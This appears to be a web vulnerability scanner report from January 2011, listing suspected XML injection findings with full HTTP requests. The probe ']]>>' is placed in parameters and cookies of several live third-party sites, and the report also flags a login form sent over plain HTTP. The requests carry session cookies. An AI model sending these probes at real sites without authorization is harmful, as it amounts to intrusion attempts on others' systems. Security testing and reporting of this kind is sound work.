GET /_vine/js/m1/vine.js?v=23247 HTTP/1.1 Host: www.polls.newsvine.com Proxy-Connection: keep-alive Referer: http://polls.newsvine.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TZM=-360; jt_time=1296350654008; sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; vid=55d515b4f7dadf9aee6395750020b187; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Fri, 26 Mar 2010 01:03:28 GMT ETag: "1258584-113ed-482a9bb29b800" Accept-Ranges: bytes Content-Type: text/javascript Cache-Control: max-age=470797 Expires: Sat, 05 Feb 2011 01:54:30 GMT Date: Sun, 30 Jan 2011 15:07:53 GMT Connection: close Vary: Accept-Encoding Content-Length: 70637
GET /blog/observations/ HTTP/1.1 Host: www.scientificamerican.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /tkfich_index/tkfich_home.htm HTTP/1.1 Host: www.six-telekurs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:03:20 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m PHP/5.2.13 mod_perl/2.0.4 Perl/v5.8.8 Content-Type: text/html Last-Modified: Sun, 30 Jan 2011 02:03:20 GMT ETag: "74935320-01010000" Expires: Sun, 30 Jan 2011 01:03:20 GMT Cache-Control: no-cache Content-Length: 26752 Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://circle.stylemepretty.com/wp-login.php
The form contains the following password field:
pwd
Request
GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1 Host: www.stylemepretty.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 02:03:24 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.16 Vary: Cookie,Accept-Encoding Set-Cookie: wpmp_switcher=desktop; expires=Mon, 30-Jan-2012 02:03:25 GMT; path=/ X-Pingback: http://www.stylemepretty.com/xmlrpc.php X-Mobilized-By: WordPress Mobile Pack 1.2.0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 30 Jan 2011 02:03:25 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 40283
GET / HTTP/1.1 Host: www.unmannedspaceflight.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.
This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.
Issue remediation
The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adsc]]>>/d775684/10/38973908/decide.php HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 19:29:46 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1065
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adsc]]>>/d852149/4/864449/decide.php HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 17:50:21 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=5, max=929 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1065
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adscgen]]>>/st.php HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 17:50:19 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=5, max=297 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1065
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adscgen/st.php]]>> HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 17:50:21 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=5, max=949 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1065
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /jt.js]]>> HTTP/1.1 Host: beacon.jump-time.net Proxy-Connection: keep-alive Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /feeds/analyticsfeed.ashx?page=http%3A//recruiting.scout.com/a.z%3Fs%3D73%26p%3D9%26c%3D4%27%26pid%3D88%26yr%3D2011&format=json]]>>&callback=$.analytics.report HTTP/1.1 Host: cdn-cms.scout.com Proxy-Connection: keep-alive Referer: http://recruiting.scout.com/a.z?s=73&p=9&c=4'&pid=88&yr=2011 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1295040115.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18; __utma=202704078.801620371.1294455998.1294851033.1295040115.3; RefId=0; BrandId=0; SessionBrandId=0
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Server: Static1 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.6.24.1.5335 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Sun, 30 Jan 2011 01:42:03 GMT Connection: close Akamai: True Content-Length: 388
The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adfeed.ashx?s=73&format=json]]>>&callback=$.showAd.cacheAdCodes HTTP/1.1 Host: cdn-forums.scout.com Proxy-Connection: keep-alive Referer: http://recruiting.scout.com/a.z?s=73&p=9&c=4'&pid=88&yr=2011 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1295040115.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18; __utma=202704078.801620371.1294455998.1294851033.1295040115.3; RefId=0; BrandId=0; SessionBrandId=0
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Server: Mbrd6 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Website-Assembly-Version: 2.21.0.0 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Sun, 30 Jan 2011 01:42:14 GMT Connection: close Akamai: True Content-Length: 455
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /quant.js]]>> HTTP/1.1 Host: edge.quantserve.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EHAAG6ANq0itiBDbz6HJXbIAAboBAfYFgfQAmtGkrxPyD5ELwXzlIG3R8gDChB0bohjR4QCJENoVz2kQ4QANEOECjRk_44OSDUKoTRMW4QsYEfopG3wRwQsRCFGx4QA9EAAiABcoSCVfgoGyODsR4Zoh
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Content-Length: 345 Date: Sun, 30 Jan 2011 17:29:29 GMT Server: QS
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The CSAnonymous cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the CSAnonymous cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /user/viewonline.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3]]>>; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 147568 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:00:06 GMT; expires=Mon, 30-Jan-2012 16:00:06 GMT; path=/ Set-Cookie: CSAnonymous=321b38d0-d73f-4f68-b4d9-58e7580c96ff; expires=Sun, 30-Jan-2011 16:20:06 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 16:00:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head><title> Who's ...[SNIP]... <a href="/forums/p/214911/508761.aspx">How to catch exceptions that occured in SOAP generated cs file (Reference.cs)? : The Official Microsoft Silverlight Site</a> ...[SNIP]...
The CommunityServer-LastVisitUpdated-2101 cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the CommunityServer-LastVisitUpdated-2101 cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /user/viewonline.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=]]>>; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 371633 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 10:50:02 GMT; expires=Mon, 30-Jan-2012 15:50:02 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:10:02 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 15:50:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head><title> Who's ...[SNIP]... <a href="/forums/p/156518/352181.aspx">How to read XML file using System.XML.LINQ and loop through nodes? : The Official Microsoft Silverlight Site</a> ...[SNIP]...
The omniID cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the omniID cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /user/viewonline.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a]]>>; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 334468 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:33:46 GMT; expires=Sun, 29-Jan-2012 23:33:46 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:53:46 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:33:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head><title> Who's ...[SNIP]... <a href="/forums/p/18945/64900.aspx">Xml Parsing problem: Xml.Rearder.ReadToFollowing causes problem : The Official Microsoft Silverlight Site</a> ...[SNIP]...
The s_sq cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the s_sq cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /user/viewonline.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA]]>>; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 237293 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:28:23 GMT; expires=Sun, 29-Jan-2012 23:28:23 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:48:23 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:28:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head><title> Who's ...[SNIP]... x">{System.InvalidOperationException: There was an error reflecting 'Exception'. ---> System.InvalidOperationException: Namespace='http://xxxx.xxxx.net/xxxx/Xxxxx' is not supported with rpc\literal SOAP. The wrapper element has to be unqualified. : The Official Microsoft Silverlight Site</a> ...[SNIP]...
The allowEmptySearch parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the allowEmptySearch parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
HTTP/1.1 400 Bad Request Content-Length: 1647 Content-Type: text/html Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI Server: CO1VB37 Cache-Control: private, max-age=86400 Date: Sun, 30 Jan 2011 19:37:30 GMT Connection: close Vary: Accept-Encoding
...<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/199 ...[SNIP]...
The appid parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the appid parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
HTTP/1.1 400 Bad Request Content-Length: 1647 Content-Type: text/html Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI Server: CO1VB38 Cache-Control: private, max-age=86400 Date: Sun, 30 Jan 2011 19:37:20 GMT Connection: close Vary: Accept-Encoding
...<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/199 ...[SNIP]...
The focusOnInit parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the focusOnInit parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
HTTP/1.1 400 Bad Request Content-Length: 1647 Content-Type: text/html Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI Server: CO1VB35 Cache-Control: private, max-age=86400 Date: Sun, 30 Jan 2011 19:37:31 GMT Connection: close Vary: Accept-Encoding
...<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/199 ...[SNIP]...
The minimumTermLength parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the minimumTermLength parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
HTTP/1.1 400 Bad Request Content-Length: 1647 Content-Type: text/html Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI Server: CO1VB29 Cache-Control: private, max-age=86400 Date: Sun, 30 Jan 2011 19:37:33 GMT Connection: close Vary: Accept-Encoding
...<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/199 ...[SNIP]...
The overrideWatermark parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the overrideWatermark parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
HTTP/1.1 400 Bad Request Content-Length: 1647 Content-Type: text/html Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI Server: CO1VB35 Cache-Control: private, max-age=86400 Date: Sun, 30 Jan 2011 19:37:27 GMT Connection: close Vary: Accept-Encoding
...<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/199 ...[SNIP]...
The scopeid parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the scopeid parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
HTTP/1.1 400 Bad Request Content-Length: 1647 Content-Type: text/html Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI Server: CO1VB32 Cache-Control: private, max-age=86400 Date: Sun, 30 Jan 2011 19:37:22 GMT Connection: close Vary: Accept-Encoding
...<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/199 ...[SNIP]...
